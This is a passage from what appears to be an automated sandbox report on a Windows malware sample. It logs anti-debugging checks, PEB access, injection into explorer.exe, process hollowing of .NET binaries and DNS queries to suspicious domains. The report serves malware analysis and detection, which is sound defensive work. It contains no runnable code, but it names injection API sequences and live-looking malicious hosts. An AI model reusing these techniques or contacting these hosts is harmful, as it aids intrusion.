                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B546730 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B546730 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B546730 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57E730 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56B73D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56B73D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B544F2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B544F2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543FC5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543FC5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543FC5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57D7CA mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57D7CA mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5837F5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D6652 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B573E70 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57CE6C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57CE6C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5CAE60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5CAE60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5CAE60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5CAE60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D2E14 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54C600 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54C600 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54C600 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5FFE3F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57C63D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54A63B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54A63B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B580E21 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5736CC mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618ED6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5716E0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5576E2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B583EE4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B583EE4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B583EE4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57DE9E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57DE9E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57DE9E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543E80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543E80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C46A7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D2EA3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B567D50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54354C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54354C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5F8D47 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5F3D40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56C577 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56C577 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54F51D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618D34 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54AD30 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B574D3B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B574D3B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B574D3B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B571520 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B571520 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B571520 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B571520 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B571520 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B603518 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B603518 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B603518 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5FFDD3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5415C1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5495F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5495F0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5F8DF1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5795EC mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543591 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B60B581 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B60B581 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B60B581 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B60B581 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B571DB5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B571DB5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B571DB5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5735A1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618C75 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55FC77 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55FC77 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55FC77 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55FC77 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B585C70 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618450 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56746D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55FC01 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55FC01 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55FC01 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55FC01 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B562430 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B562430 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B61740D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B61740D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B61740D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B544439 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618C14 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57BC2C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542CDB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57CCC0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57CCC0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57CCC0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57CCC0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B6014FB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618CD6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54649B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54649B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B619CB3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B541480 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B544CB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57D4B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Md0q201V1D.exeProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\21.exeProcess queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\gbhudtbProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\Md0q201V1D.exeCode function: 0_2_0041D440 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B576B90 rdtsc
                Source: C:\Users\user\Desktop\Md0q201V1D.exeCode function: 3_1_004026C8 LdrLoadDll,
                Source: C:\Users\user\AppData\Local\Temp\B096.exeMemory allocated: page read and write | page guard
                Source: C:\Users\user\Desktop\Md0q201V1D.exeCode function: 0_2_0041D440 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\Desktop\Md0q201V1D.exeCode function: 0_2_004266D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Users\user\AppData\Roaming\gbhudtbCode function: 14_2_0041D440 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Roaming\gbhudtbCode function: 14_2_004266D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                System process connects to network (likely due to code injection or exploit)Show sources
                Source: C:\Windows\explorer.exeDomain query: iyc.jelikob.ru
                Source: C:\Windows\explorer.exeDomain query: xacokuo8.top
                Source: C:\Windows\explorer.exeDomain query: znpst.top
                Source: C:\Windows\explorer.exeNetwork Connect: 216.128.137.31 80
                Source: C:\Windows\explorer.exeDomain query: nusurtal4f.net
                Source: C:\Windows\explorer.exeDomain query: privacytoolzforyou-6000.top
                Source: C:\Windows\explorer.exeDomain query: hajezey1.top
                Source: C:\Windows\explorer.exeDomain query: sysaheu90.top
                Benign windows process drops PE filesShow sources
                Source: C:\Windows\explorer.exeFile created: C066.exe.10.drJump to dropped file
                Maps a DLL or memory area into another processShow sources
                Source: C:\Users\user\Desktop\Md0q201V1D.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\Desktop\Md0q201V1D.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Local\Temp\21.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Local\Temp\21.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Roaming\gbhudtbSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Roaming\gbhudtbSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\user\AppData\Roaming\gbhudtbMemory written: C:\Users\user\AppData\Roaming\gbhudtb base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\gbhudtbMemory written: C:\Users\user\AppData\Roaming\gbhudtb base: 400000 value starts with: 4D5A
                Contains functionality to inject code into remote processesShow sources
                Source: C:\Users\user\AppData\Roaming\gbhudtbCode function: 14_2_02BE0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                Creates a thread in another existing process (thread injection)Show sources
                Source: C:\Users\user\Desktop\Md0q201V1D.exeThread created: C:\Windows\explorer.exe EIP: 4DE1920
                Source: C:\Users\user\AppData\Local\Temp\21.exeThread created: unknown EIP: 2D61920
                Source: C:\Users\user\AppData\Roaming\gbhudtbThread created: unknown EIP: 5B71920
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeThread created: unknown EIP: 5AB19C0
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exeThread created: unknown EIP: 5B01920
                Sample uses process hollowing techniqueShow sources
                Source: C:\Users\user\AppData\Local\Temp\B096.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe base address: 400000
                Source: C:\Users\user\AppData\Local\Temp\B096.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe base address: 400000
                Source: C:\Users\user\Desktop\Md0q201V1D.exeProcess created: C:\Users\user\Desktop\Md0q201V1D.exe 'C:\Users\user\Desktop\Md0q201V1D.exe'
                Source: C:\Users\user\AppData\Roaming\gbhudtbProcess created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
                Source: C:\Users\user\AppData\Local\Temp\21.exeProcess created: C:\Users\user\AppData\Local\Temp\21.exe C:\Users\user\AppData\Local\Temp\21.exe
                Source: C:\Users\user\AppData\Roaming\gbhudtbProcess created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
